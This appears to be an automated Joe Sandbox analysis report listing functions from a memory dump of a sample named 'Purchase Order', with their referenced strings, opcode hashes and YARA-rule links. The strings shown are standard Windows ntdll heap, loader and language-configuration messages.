                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                            • API String ID: 0-1356375266
                                            • Opcode ID: 625d51cf33437dceeaa5684b318af205aa6f9e22828585408a86a700eccb9acc
                                            • Instruction ID: f24533aba5dd68037895983ba8cf68230b97399f743bd2912cf4df7fc45dbaeb
                                            • Opcode Fuzzy Hash: 625d51cf33437dceeaa5684b318af205aa6f9e22828585408a86a700eccb9acc
                                            • Instruction Fuzzy Hash: 24A13EB1908345DFE351CF24C490B9BB7E8FF84769F404A2EE59896240E779E948CF52
                                            Function 3483B730 Relevance: 10.1, Strings: 7, Instructions: 1323COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$\SysWOW64$minkernel\ntdll\ldrutil.c
                                            • API String ID: 0-1558337705
                                            • Opcode ID: 1ed3a36ab5d945eb0c35957d054132beed1d5d5af0b98d7902de2cc829022d39
                                            • Instruction ID: ac6174bdc134f034cf76ab541d817f77ae3fb7377ba5a5f3c9ad6ac92e9ada9e
                                            • Opcode Fuzzy Hash: 1ed3a36ab5d945eb0c35957d054132beed1d5d5af0b98d7902de2cc829022d39
                                            • Instruction Fuzzy Hash: 7DC25AB9A017298FEB64CF18CC807AAB7B5BF44344F4046EDD609AB251DB749E81CF94
                                            Function 3481F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-523794902
                                            • Opcode ID: c39dd413e8232ab39a9476625262b53ee88bbec5ae0d9ffb0517f3fb33f53899
                                            • Instruction ID: c5914a517f28be7f69018a70480f8c04215fd73154c92077c49a77b8cf65040b
                                            • Opcode Fuzzy Hash: c39dd413e8232ab39a9476625262b53ee88bbec5ae0d9ffb0517f3fb33f53899
                                            • Instruction Fuzzy Hash: 8742BE79209785DFE305CF28C890A6ABBE5FF88344F144A6EE995CB352DB34D842CB51
                                            Function 3483B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                            • API String ID: 0-122214566
                                            • Opcode ID: e8215858bbab3c8f95cb0ea50267f5b82fd0b095a4faffbb45e0756a1e75f50f
                                            • Instruction ID: 2de0871636d1ac636ab4f512581fe9dbf5d42b5ff02720e56c174402dc9e6489
                                            • Opcode Fuzzy Hash: e8215858bbab3c8f95cb0ea50267f5b82fd0b095a4faffbb45e0756a1e75f50f
                                            • Instruction Fuzzy Hash: ADC127BAB023199FEB148B6CCC80BBE77A5AF45314F104769E811AB392DBB4C944C3D0
                                            Function 34830770 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-4253913091
                                            • Opcode ID: 946709ec36a3d77a99d5877989b452f52be7e54444632e9fc09553ed84711d3b
                                            • Instruction ID: f95d382aa65ad754f219b525d3dd622e7293b91a11f6db44cd93e3e553aa3848
                                            • Opcode Fuzzy Hash: 946709ec36a3d77a99d5877989b452f52be7e54444632e9fc09553ed84711d3b
                                            • Instruction Fuzzy Hash: 50F1BE78702609DFEB15CF68C890B6AB7F5FF46308F1042A8E5559B395DB34E981CB90
                                            Function 3484F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                            Download Yara Rule
                                            Strings
                                            • RTL: Re-Waiting, xrefs: 3489031E
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 348902E7
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 348902BD
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                            • API String ID: 0-2474120054
                                            • Opcode ID: ad75701bf08b071e8dad2953d2f8881658c96ba01c360052d83b56ed886f916f
                                            • Instruction ID: aebb0bc8736ee0218364a429799e0f8fe5c47fe6809da52388db611c87df782c
                                            • Opcode Fuzzy Hash: ad75701bf08b071e8dad2953d2f8881658c96ba01c360052d83b56ed886f916f
                                            • Instruction Fuzzy Hash: 4BE18B74608B45DFE715CF28C880B6AB7E4AB89364F104B5DE6A5CB3A0DB78D845CB42
                                            Function 348451EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                            Download Yara Rule
                                            Strings
                                            • Kernel-MUI-Number-Allowed, xrefs: 34845247
                                            • Kernel-MUI-Language-SKU, xrefs: 3484542B
                                            • WindowsExcludedProcs, xrefs: 3484522A
                                            • Kernel-MUI-Language-Disallowed, xrefs: 34845352
                                            • Kernel-MUI-Language-Allowed, xrefs: 3484527B
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                            • API String ID: 0-258546922
                                            • Opcode ID: 1ba4f75ce1617709b20baf406f1ba03a20af24f2d1dc9aba3dde2e66bec8fd76
                                            • Instruction ID: 77816814907518929be0e38dbb1db63e548a98ada263f50ed7686f398ac9f4b2
                                            • Opcode Fuzzy Hash: 1ba4f75ce1617709b20baf406f1ba03a20af24f2d1dc9aba3dde2e66bec8fd76
                                            • Instruction Fuzzy Hash: DAF13CB6D01219EFDB41CF98C9809DEBBF9FF48750F55026AE511AB310DB749E018BA0
                                            Function 348AFD2A Relevance: 6.4, Strings: 5, Instructions: 115COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Item:$ Language:$ Name:$SR - $Type:
                                            • API String ID: 0-3082644519
                                            • Opcode ID: 3a6d128a0f3ad174c390f021387ce45c0cd36211998709a2ef55d9eb2ac0d174
                                            • Instruction ID: f3b6a4be0cc79931e4b043e90c475144ece6f79b76a4c42b9a6cc4f4410fa2d2
                                            • Opcode Fuzzy Hash: 3a6d128a0f3ad174c390f021387ce45c0cd36211998709a2ef55d9eb2ac0d174
                                            • Instruction Fuzzy Hash: 9A418971A01128AFDB21CB68DC58BDAB7BCEF45304F4442D5E559A7240DEB4DE84CF91
                                            Function 348176B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlReAllocateHeap
                                            • API String ID: 0-941669491
                                            • Opcode ID: 1277c9e0a8bc3daf05bdc1fdd9199304b67db81e101ae9bd28db715e13da5ebf
                                            • Instruction ID: 52c32829c1dde246340fdef1095491e681fffab948f2aa8b570050f34e20f07b
                                            • Opcode Fuzzy Hash: 1277c9e0a8bc3daf05bdc1fdd9199304b67db81e101ae9bd28db715e13da5ebf
                                            • Instruction Fuzzy Hash: 2801F77A119680DFF316D76CE819FD27BD8DF4A670F28429AE0108B752DAA59882CD60
                                            Function 3482BEC0 Relevance: 5.7, Strings: 4, Instructions: 694COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $$.mui$.mun$SystemResources\
                                            • API String ID: 0-3047833772
                                            • Opcode ID: c786c80416c815f0386725f22e223305fd4ca527e1f2f9dffc0b4559998fa680
                                            • Instruction ID: 5e84b3151b0e138657ef216b760c0701d88c557d1f074f6ef62f61723a0b6441
                                            • Opcode Fuzzy Hash: c786c80416c815f0386725f22e223305fd4ca527e1f2f9dffc0b4559998fa680
                                            • Instruction Fuzzy Hash: A3623B76B003298EDB21CF54CC40BEAB7B8BB0A354F4046EAD409A7A50DB759EC5CF52
                                            Function 3481F626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                            • API String ID: 0-2586055223
                                            • Opcode ID: 39787ac3b0d71398c342c61dbe27b771653ef3116eeae39dc1f55f6e93cf67d2
                                            • Instruction ID: 330767d83c8a10660c6a1c7ec2a8e9d813c4668c2810df0229b53f42db4af2f2
                                            • Opcode Fuzzy Hash: 39787ac3b0d71398c342c61dbe27b771653ef3116eeae39dc1f55f6e93cf67d2
                                            • Instruction Fuzzy Hash: E861F376205784DFE311CB28D854F677BE8EF84754F040669FAA4CB292DB78E841CB61
                                            Function 348D11A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                            • API String ID: 2994545307-336120773
                                            • Opcode ID: 182d8eaf1c65f2b2a5a19d4c925545f5b6128d7892b8c2eb0ccb04a67970c34b
                                            • Instruction ID: b42362ad04ff03f41cfcf1725553e900d0569f09d2a2dc82c6a24ac5f0b42405
                                            • Opcode Fuzzy Hash: 182d8eaf1c65f2b2a5a19d4c925545f5b6128d7892b8c2eb0ccb04a67970c34b
                                            • Instruction Fuzzy Hash: A331EF76202204EFE701CF9CC880F5673E8EF0A664F10035AE451DB292EA72EC45CE64
                                            Function 34819148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                            • API String ID: 0-1391187441
                                            • Opcode ID: 0ccf549b0c25ad91186de159e30ad6a32823e6f579cbd656a3c7de0df37f02a7
                                            • Instruction ID: 158ca330326942c0732d0bc56dd649d600f564165d217595c35ca0fa26bc6213
                                            • Opcode Fuzzy Hash: 0ccf549b0c25ad91186de159e30ad6a32823e6f579cbd656a3c7de0df37f02a7
                                            • Instruction Fuzzy Hash: 4831D576600208EFD701DB9DCC84F9AB7F9EF45764F104296E815AB291E774DD81CE60
                                            Function 348CFCDF Relevance: 5.1, Strings: 4, Instructions: 54COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: HEAP: $HEAP[%wZ]: $May not destroy the process heap at %p$RtlDestroyHeap
                                            • API String ID: 2994545307-4256168463
                                            • Opcode ID: aa27d45f750d888ae245fe4e32a2338bae07047e1409f143e539f0f47eebcd49
                                            • Instruction ID: 9ece09a25d0202a07bd0c59e2bbe04887c912a8dff08a3c47a0e55cc30420616
                                            • Opcode Fuzzy Hash: aa27d45f750d888ae245fe4e32a2338bae07047e1409f143e539f0f47eebcd49
                                            • Instruction Fuzzy Hash: 0701D276101604DFF711EB68D400B86B3FAEF06660F00479AE601DB286DA74ED4ACE54
                                            Function 34827152 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            • Opcode ID: 80c6a02ff9970ce1fab4bdadd78e063cc18dc22d0d67ed646799caebac0fabd9
                                            • Instruction ID: c8fe88a7127d8c07a0007326c8d53ac321003379c11dafea8a494c07146f8f62
                                            • Opcode Fuzzy Hash: 80c6a02ff9970ce1fab4bdadd78e063cc18dc22d0d67ed646799caebac0fabd9
                                            • Instruction Fuzzy Hash: 7451DF35A0470AEFFB05DB69C944BADBBB8FF44355F104269E512A3290EFB49981CB80
                                            Function 34831F92 Relevance: 4.3, Strings: 3, Instructions: 563COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                            • API String ID: 0-3178619729
                                            • Opcode ID: 8dfadbf505076ec394c20204e60c0344f2e905937e37627e910bc1c930cf5a13
                                            • Instruction ID: 13af024dc3b61973179be486627424f670532a059b0806242473890729cabe9d
                                            • Opcode Fuzzy Hash: 8dfadbf505076ec394c20204e60c0344f2e905937e37627e910bc1c930cf5a13
                                            • Instruction Fuzzy Hash: C72202B8601745DFEB01CF28C850B6ABBF5FF05704F248699E8559B392E771E882CB90
                                            Function 348217EC Relevance: 4.3, Strings: 3, Instructions: 520COMMON
                                            Download Yara Rule
                                            Strings
                                            • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 3487F8CC
                                            • HEAP[%wZ]: , xrefs: 3487F8AA
                                            • HEAP: , xrefs: 3487F8B7
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                            • API String ID: 0-3178619729
                                            • Opcode ID: 2c8b665ca69d0ef701ea47f816e320db1346a90294d4a63cef96a8ea03487a0e
                                            • Instruction ID: 99ad438859f6bb2d0f1278631cd178127debab7c121bbd3604fe2d2bfc5299dd
                                            • Opcode Fuzzy Hash: 2c8b665ca69d0ef701ea47f816e320db1346a90294d4a63cef96a8ea03487a0e
                                            • Instruction Fuzzy Hash: 2612EE74704356EFE715CF29C090B66BBE5BF05308F64869DE5A98B285E770E881CBA0
                                            Function 34821460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                            Download Yara Rule
                                            Strings
                                            • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 34821728
                                            • HEAP[%wZ]: , xrefs: 34821712
                                            • HEAP: , xrefs: 34821596
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                            • API String ID: 0-3178619729
                                            • Opcode ID: 09ec427cb6c0b7b76f426d919296c47ad088224d10e62ddf1be37232f334c132
                                            • Instruction ID: 7d6288fca8e032cc7280e992535849f41d172452dd9328da4e485b151d9f736a
                                            • Opcode Fuzzy Hash: 09ec427cb6c0b7b76f426d919296c47ad088224d10e62ddf1be37232f334c132
                                            • Instruction Fuzzy Hash: 56E11174A047459FE714CF28C490B7ABBF5EF88340F24865DE9A6CB246EB34E981CB50
                                            Function 3482B6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                            • API String ID: 0-1145731471
                                            • Opcode ID: 91da170db6ddb24295bebce5bef3cdda950087e9d9a79e1a20b65a938bd03981
                                            • Instruction ID: dc5e76f7b5c10bebef39fee1a8174a2c44924a89cfa99efc0a0ee6404515097a
                                            • Opcode Fuzzy Hash: 91da170db6ddb24295bebce5bef3cdda950087e9d9a79e1a20b65a938bd03981
                                            • Instruction Fuzzy Hash: 16B1CC75A057088FEB15CF69C980B9DB7B6BF44390F144A2DE855EB380E775E880CB41
                                            Function 348A7410 Relevance: 4.0, Strings: 3, Instructions: 233COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                            • API String ID: 0-3870751728
                                            • Opcode ID: bc5bb17c0c1f82389817430f30ce9a514aa26bb5d3c644ad1e3556a31cfee853
                                            • Instruction ID: f4743b1cb6e1c768776d83683805043acd072400b73b0772bf60f70e91d32e9e
                                            • Opcode Fuzzy Hash: bc5bb17c0c1f82389817430f30ce9a514aa26bb5d3c644ad1e3556a31cfee853
                                            • Instruction Fuzzy Hash: B5913BB4E002099FEB14CF69C880B9DBBF1BF48314F14826AE915AB391E7B5D842DF54
                                            Function 3485909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
